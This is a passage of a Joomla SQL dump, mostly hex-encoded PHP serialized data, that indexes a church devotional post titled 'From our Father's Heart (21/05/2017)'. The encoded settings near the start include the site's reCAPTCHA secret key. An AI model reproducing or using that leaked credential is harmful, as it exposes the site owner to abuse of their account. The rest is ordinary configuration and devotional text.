b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223134223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2234313a66726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f34312d66726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3431223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34313a66726f6d2d6f75722d6661746865722d732d68656172742d30322d30342d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832312f30352f3230313729223b733a31313a226465736372697074696f6e223b733a3434383a2220446561726c792042656c6f766564206f6620476f642c20426520436f6e666964656e7420696e20476f6427732050726f6d6973652120446f6e2774206c657420796f757220747275737420696e20746865204c6f726420646965206e6f206d617474657220776861742068617070656e732e204576656e20696e207468652066616365206f66206e6567617469766520736974756174696f6e7320616e642063697263756d7374616e636573207768696368207365656d20756e6661766f757261626c652c206e65766572206c657420796f757220636f6e666964656e636520696e20476f64277320776f726420616e64206162696c697479206469652e20476f6420697320616c7761797320657665722061626c6520746f20646f2077686174204865207361696420486520776f756c6420646f2e204576656e207768656e20796f75206172652068617264207072657373656420616e642061726520676f696e67207468726f75676820746f7567682074696d65732c206c657420796f7572206865617274207374617920696e20476f6420616e64206c657420796f757220636f6e666964656e636520696e2048696d206e6576657220776176652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d30392031333a34393a3032223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d30392031333a34393a3032223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(266, 'index.php?option=com_k2&view=item&id=48', 'index.php?option=com_k2&view=item&id=48:from-our-father-s-heart-21-05-2017', 'From our Father\'s Heart (21/05/2017)', ' Dearly Beloved of God, Be Confident in God\'s Promise! Don\'t let your trust in the Lord die no matter what happens. Even in the face of negative situations and circumstances which seem unfavourable, never let your confidence in God\'s word and ability die. God is always ever able to do what He said He would do. Even when you are hard pressed and are going through tough times, let your heart stay in God and let your confidence in Him never wave. ', '2017-06-25 14:19:40', 'f3ab6d903052d4ae05f66a4372c18c0c', 1, 1, 1, '*', '2017-05-21 18:49:52', '0000-00-00 00:00:00', '2017-05-21 18:49:52', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223438223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d32312d30352d32303137223b733a373a2273756d6d617279223b733a3438383a223c703e3c7374726f6e673e446561726c792042656c6f766564206f6620476f642c3c2f7374726f6e673e3c2f703e0d0a3c703e426520436f6e666964656e7420696e20476f6427732050726f6d697365213c2f703e0d0a3c703e446f6e2774206c657420796f757220747275737420696e20746865204c6f726420646965206e6f206d617474657220776861742068617070656e732e204576656e20696e207468652066616365206f66206e6567617469766520736974756174696f6e7320616e642063697263756d7374616e636573207768696368207365656d20756e6661766f757261626c652c206e65766572206c657420796f757220636f6e666964656e636520696e20476f64277320776f726420616e64206162696c697479206469652e20476f6420697320616c7761797320657665722061626c6520746f20646f2077686174204865207361696420486520776f756c6420646f2e204576656e207768656e20796f75206172652068617264207072657373656420616e642061726520676f696e67207468726f75676820746f7567682074696d65732c206c657420796f7572206865617274207374617920696e20476f6420616e64206c657420796f757220636f6e666964656e636520696e2048696d206e6576657220776176652e3c2f703e0d0a223b733a343a22626f6479223b733a313738323a220d0a3c703e4162726168616d2073746f6f6420776974682068697320636f6e666964656e636520756e7761766572696e6720696e20476f64207468617420476f64207761732061626c6520746f20676976652068696d206120736f6e2e204576656e207768656e20476f642064656d616e64656420497361616320746f20626520736c6175676874657265642c204162726168616d20636f6e666964656e746c792077656e7420746f20746865206d6f756e7461696e2c2062656c696576696e67207468617420476f64207761732061626c6520746f20726169736520746865206465616420616e642068652068616420616e6f7468657220656e636f756e746572207769746820476f642e3c2f703e0d0a3c703e54686520466174686572206861732073706f6b656e2061206c6f7420746f207573206f7665722074686520796561727320616e642074686f736520776f726473207265666c656374207468652072656c65617365206f662068656176656e206f7665722075732e2047657420616c6c20746865736520776f72647320616e6420707574207468656d206f76657220796f757273656c66206576657279206461792e20436f6e66657373207468656d2c20726563697465207468656d2c206465636c617265207468656d2c207072617920616c6c2074686f73652070726179657220706f696e747320616761696e206173207765206a6f75726e6579206f6e207769746820476f6420616e6420796f752077696c6c207365652065766572797468696e67206265636f6d65207265616c69747920696e20796f7572206c6966652e20546869732077696c6c2064657465726d696e6520686f7720746865206675747572652077696c6c20626520666f7220796f752ec2a03c2f703e0d0a3c703e54686520667574757265206973206c6f6164656420666f7220757320616c72656164792c2062757420697420697320796f757220726573706f6e736962696c69747920746f2061637469766174652074686f736520776f726473206f76657220796f757273656c6620616e6420796f75722066616d696c792e20596f752073686f756c64206461696c7920636f6e666573732074686f736520636f76656e616e747320616e642070726f6d69736573206f76657220796f7572206c6966652e204c657420616c6c20796f757220776f72647320616c69676e20776974682074686520636f76656e616e7473207468617420476f6420686173206d61646520776974682075732e2054686520646576696c2077696c6c2074727920746f206d616b6520796f752063616e63656c20616c6c2074686f736520776f7264732062757420796f75206d75737420616c69676e20796f7572206d6f757468207769746820796f75722070726f706865636965732e205468617420697320796f7572206b657920746f20746865206c69666520476f642068617320707265706172656420666f7220796f7520696e206c6966652ec2a03c2f703e0d0a3c703e42656c6f7665642c207768656e206461792069732061626f757420746f20627265616b2c20746861742773207768656e20746865206e69676874206973206461726b6573742e205768656e206974206c6f6f6b73206c696b6520796f752063616e27742074616b6520697420616e796d6f72652c206a7573742072656d656d626572207768617420476f6420686173207361696420746f20796f7520706572736f6e616c6c79207468726f7567682048697320576f726420616e6420746f2075732061732061206368757263682c207468656e2070757420796f757220636f6e666964656e636520696e207468617420776f72642e20476f6420697320636f6d6d697474656420746f206272696e67696e672077686174204865207361696420746f20706173732e3c2f703e0d0a3c703e446f6e27742070757420796f757220636f6e666964656e636520696e20666c6573682c20696e206d656e206f7220696e207468696e67732e20446f6e2774206576656e2070757420796f757220636f6e666964656e636520696e20796f757273656c662e204a757374206c657420796f757220636f6e666964656e6365207374617920616e642067726f7720696e20476f64277320696d6d75746162696c69747920616e642074686520696d6d75746162696c697479206f662048697320776f72643b2062652070617469656e7420616e64206c65742048696d20776f726b2e3c2f703e0d0a3c703e486562726577732031303a33353c2f703e0d0a3c703e3335205468657265666f726520646f206e6f742063617374206177617920796f757220636f6e666964656e63652c20776869636820686173206772656174207265776172642e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375733c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30362d32352031313a31383a3531223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b7